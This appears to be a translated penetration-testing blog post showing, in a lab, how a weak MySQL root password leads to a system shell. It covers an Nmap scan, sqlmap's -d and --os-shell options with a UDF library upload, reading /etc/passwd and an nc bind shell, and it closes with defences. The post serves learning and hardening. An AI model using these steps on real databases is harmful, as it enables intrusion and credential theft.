Penetration Learning Notes--scenario--get shell from MySQL root account

Scenario Description:
today's scene is the previous week in the network infiltration encountered, found a MySQL database weak password.
The account number and password are root, the DBA in MySQL, respectively.
In fact, the permissions are very large, first of all, the root user of MySQL has the file write permission, while mysql5.0 above, provide a system function, which is usually used by the attacker as the shell interface.
At that time , when encountering this weak password, I was thinking how to quickly take down the host, through the root account of MySQL. Whether there is a more rapid method, at this time, I certainly think of Sqlmap. After querying the documentation on GitHub, I found such parameters.
below, let's learn this scene together!


Environment:
Two machines, one is Kali Linux, as MySQL server, open SSH service and MySQL service, IP address is 192.168.80.128.

Another is Ubuntu, as the attack host, installed Nmap, SQLMAP,IP address of 192.168.80.129.


1, first we scan the common port Nmap,
The command is as follows: Nmap-a-n-t3 192.168.80.128
scan results such as:

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/77/B5/wKiom1ZsTUnBK6BWAAB5EbJy_iw700.png "border=" 0 "Width="/>

2, the second step is mainly through the demolition tool found MySQL weak password, this step ignored.
3, now the main content, we get MySQL root account and password after how to use
1) Let's take a look at the Sqlmap document on GitHub (ClickMe)

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/77/B4/wKioL1ZsTU3BfB2zAACPYI0AZNg063.png "border=" 0 "Width="/>

We can see that this is a "-d" option, and the usage in for example has
The whole syntax is: "Dbms://user:[email protected]_ip:dbms_port/database_name" or "Dbms://database_filepath".
[1] DBMS: Represents the database used, as we are here MySQL
[2] User: For users of our database, as we are here root
[3] PASSWORD: The password that corresponds to our data, such as my server is 3erver
[4] DBMA_IP: The database server corresponds to the IP address, as I am here for 192.168.80.128
[5] Dbms_port: The port used by the data server cannot be omitted. Default We write 3306
[6] database_name: The database name you want to use, because MySQL will typically have a test database, as I use test here. If there is no test, we can use CREATE database test by ourselves;
2) below we start to use, on the server I first run the MySQL database as root. See what's going to happen. In MySQL, running the database in what capacity will be/etc/mysql/my.cnf this configuration file setting. So I'm going to change the user mysqld node to root. Such as:

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/77/B4/wKioL1ZsTU3R2Dz3AAAy7O07SNM493.png "border=" 0 " Width= "626"/>

by looking at the process, we can see that the mysqld has--user=root this option when the service is started.
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/77/B5/wKiom1ZsTUqT8mtPAAArBz0ZrP8514.png "border=" 0 "Width="/>

3) Now I'm starting to connect to the MySQL server in Kali based on the SQLMAP option.
sqlmap-d "Mysql://root:[email protected]:3306/test"-F

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/77/B4/wKioL1ZsTU3jXctOAAA6_slSq4k666.png "border=" 0 "Width="/>

The above-f parameter is the version information that prints the MySQL server. As
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/77/B5/wKiom1ZsTUqCsGshAABgzHcE4x4123.png "border=" 0 "Width="/>

We then change the-f parameter to the--os-shell parameter
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/77/B5/wKiom1ZsTUqRbPDWAAA9xssY_eE655.png "border=" 0 "Width="/>

then Sqlmap will let us choose the number of servers, if you do not know to guess one, anyway two options, not 32 bits is 64 bit.
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/77/B4/wKioL1ZsTU2wSZLEAADuDL0ufYc067.png "border=" 0 "Width="/>

I choose 64 bits here, and then the system will upload the corresponding number of dynamic link library files for us, this file provides the system function so that we can execute the systems command. ,
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/77/B5/wKiom1ZsTUrjLP32AAAXNtpC26k829.png "border=" 0 " Width= "/>"

when we enter the WhoAmI command, we will ask if we return the output of the command. We select "A" here, which means that the output of the command is always returned. You can see here that the permissions are consistent with the user rights of the MySQL server that we run. That means we get root privileges here, such as viewing/etc/passwd,nc bounce shell, adding users, and so on.
Ifconfig Information:

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/77/B4/wKioL1ZsTU3S6wfoAAB1jw0cWTY421.png "border=" 0 " Width= "/>"

view/etc/passwd file,
650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M01/77/B5/wKiom1ZsTUrw0Z5DAAA7X_JP7Sk469.png "border=" 0 "Width=" 597 "/>

NC Bounce Shell
(1) Perform NC and listen on 2333 ports on MySQL server.

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/77/B4/wKioL1ZsTU6j8oTyAAAGIvIlF14863.png "border=" 0 "Width=" 498 "/>

(2) We view the IP of our attack aircraft, we can see that it is indeed 192.168.80.129.
We use NCAT 192.168.80.128 2333来 to connect the bounce shell.

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M02/77/B5/wKiom1ZsTUrRvS7WAABdsz_BCw8061.png "border=" 0 "Width="/>

(4) Here, we have completed the process of how to quickly use a MySQL root account to obtain system permissions.
4. What are the limitations?
(1) We mentioned here that the user running MySQL needs to be the root account. Because the whole process here is like this.
[1]sqlmap Connect to the remote database via root account and password
[2]sqlmap Upload a 64-bit or 32-bit dynamic-link library file for the system platform under the UDF folder to the remote database.
Under the/usr/lib/mysql/plugin/directory
[3]sqlmap has used the uploaded dynamic link library file to invoke the system function to execute a user-entered command.]
(2) As mentioned above, we want to upload the dynamic link library to the/usr/lib/mysql/plugin/directory, but this directory only has the Write permission for the root account. In other words, if the user running mysqld is not root, then we cannot execute the system command in this way.
(3) In general, the MySQL root account on Windows can execute more system commands, because it is necessary to set up a non-administrator user to run MySQL, so a part of the system administrator will run MySQL on the Administrator rights account, this time we will gain access to it.


5. Defense strategy
(1) Linux minimum permission principle, do not give the MySQL data plugin folder to write permission, even if it is given to restrict the users who have permissions. We can log into the database and use
SELECT @ @plugin_dir;
To see the plugin directory, such as the one I got on Windows Plugin_dir

650) this.width=650; "src=" http://s3.51cto.com/wyfs02/M00/77/B4/wKioL1ZsTU6S6OOkAAAVRJpi0Do753.png "border=" 0 " Width= "433"/>

(2) It is best to let root only run on localhost, and the database users who can access the remote only assign the permissions such as delete and change, do not assign file permissions.


6, this article is based on the scene mode to write, and then introduce tools and the use of methods.

This article is from the "line and enjoy" blog, please be sure to keep this source http://skytina.blog.51cto.com/6834539/1722403

Penetration Learning Notes--scenario--get shell from MySQL root account